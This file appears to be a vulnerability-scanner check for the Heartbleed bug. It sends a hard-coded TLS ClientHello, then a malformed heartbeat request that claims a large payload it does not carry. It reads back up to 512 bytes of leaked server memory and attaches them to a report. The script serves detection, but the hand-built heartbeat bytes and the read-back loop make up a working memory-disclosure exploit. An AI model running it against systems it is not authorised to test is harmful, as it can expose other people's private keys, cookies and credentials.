#noretest;
#include "string_helpers.inc";
#include "debug_helpers.inc";
var CLIENT_HELLO_MSG = strFromRawData(0x16, 0x03, 0x02, 0x00,  0xdc, 0x01, 0x00, 0x00, 0xd8, 0x03, 0x02, 0x53,0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b, 0xbc,  0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97, 0xcf,0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85, 0x03,  0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde, 0x00,0x00, 0x66, 0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22,  0xc0, 0x21, 0x00, 0x39, 0x00, 0x38, 0x00, 0x88,0x00, 0x87, 0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35,  0x00, 0x84, 0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c,0xc0, 0x1b, 0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d,  0xc0, 0x03, 0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09,0xc0, 0x1f, 0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32,  0x00, 0x9a, 0x00, 0x99, 0x00, 0x45, 0x00, 0x44,0xc0, 0x0e, 0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96,  0x00, 0x41, 0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c,0xc0, 0x02, 0x00, 0x05, 0x00, 0x04, 0x00, 0x15,  0x00, 0x12, 0x00, 0x09, 0x00, 0x14, 0x00, 0x11,0x00, 0x08, 0x00, 0x06, 0x00, 0x03, 0x00, 0xff,  0x01, 0x00, 0x00, 0x49, 0x00, 0x0b, 0x00, 0x04,0x03, 0x00, 0x01, 0x02, 0x00, 0x0a, 0x00, 0x34,  0x00, 0x32, 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x19,0x00, 0x0b, 0x00, 0x0c, 0x00, 0x18, 0x00, 0x09,  0x00, 0x0a, 0x00, 0x16, 0x00, 0x17, 0x00, 0x08,0x00, 0x06, 0x00, 0x07, 0x00, 0x14, 0x00, 0x15,  0x00, 0x04, 0x00, 0x05, 0x00, 0x12, 0x00, 0x13,0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x0f,  0x00, 0x10, 0x00, 0x11, 0x00, 0x23, 0x00, 0x00,0x00, 0x0f, 0x00, 0x01, 0x01);
var HEARTBEAT_MSG = strFromRawData(0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00);
// **************************************************************************************							 
function debug(strValue)
{
	//trace(strValue);
}
// **************************************************************************************							 
function alert(fname, memoryDump)
{	
	var ri = new TReportItem();
	ri.LoadFromFile(fname);
	ri.affects = "Web Server";
	ri.alertPath = "Scripts/" + fname; 	
	
	if (memoryDump) 
		ri.Details =  ri.Details + "First 512 bytes of data we pulled from the server memory: [pre]" + memoryDump + "[/pre]";	
	
	AddReportItem(ri);	
}
// **************************************************************************************							 
function testServer(port){
	var socket = new TSocket('tcp');
	socket.host = scanIP;	
	socket.port = port;
	
	if (scanURL.scheme == 'https')	socket.timeout = 5;
	else socket.timeout = 4;
	
	if (!socket.Connect())
	{
		debug("getServerCertificate -> Can not connect to host");
		return(false);
	}
	var serverHelloReceived = false;
	// send client HELLO message	
	socket.Send(CLIENT_HELLO_MSG);
	// waiting for server HELLO
	for (var i = 0; i < 10; i++) 
	{
		debug("SSL3 record no. " + i);
		tmp = socket.ReceiveBytes(5);
		if (tmp.length != 5) 
		{
			debug('Invalid SSL record layer data 0');
			socket.Close();
			return(false);
		}
		
		var typ = tmp.getByteAt(0);
		debug(typ);
		var ver = tmp.getWordAt(1);
		debug(ver);
		var len = tmp.getWordAt(3);
		debug(len);
		socket.timeout = 10;
		var payload = socket.ReceiveBytes(len);		
		socket.timeout = 5;
		if (payload.length != len) 
		{
			debug('Invalid payload');
			socket.Close();
			return(false);
		}		
		
		if (typ == 22 && payload.getByteAt(0) == 0x0E) {
			debug("received server hello");
			serverHelloReceived = true;
			break;
		}		
	}
	
	if (serverHelloReceived) {
		debug("sending server heartbeat");
		socket.Send(HEARTBEAT_MSG);
		
		debug("wait for response");
		for (var i = 0; i < 100; i++) 
		{
			debug("SSL3 record no. " + i);
			tmp = socket.ReceiveBytes(5);
			if (tmp.length != 5) 
			{
				debug('Invalid SSL record layer data 0');
				socket.Close();
				return(false);
			}
			
			var typ = tmp.getByteAt(0);
			debug(typ);
			var ver = tmp.getWordAt(1);
			debug(ver);
			var len = tmp.getWordAt(3);
			debug(len);
			socket.timeout = 10;
			if (typ == 21) {
				debug("received an alert");
				break;
			}
			
			if (typ == 24) {
				debug("received heartbeat with length " + len);
				if (len>3) {
					debug("vulnerable");
					var partialLength = len;
					if (partialLength > 512) partialLength = 512;
					
					payload = socket.ReceiveBytes(partialLength);					
					if (payload.length) {				
						alert("Heartbleed_Bug.xml", payload.toHexString16B());
					}					
					break;
				}
			}		
		}		
	}
	
	socket.Close();
}
// ***************************
// main()
// ***************************
var port = 443;
if (scanURL.scheme == 'https'){
	if (scanURL.port && !isNaN(scanURL.port)) port = scanURL.port;	
}
testServer(port);
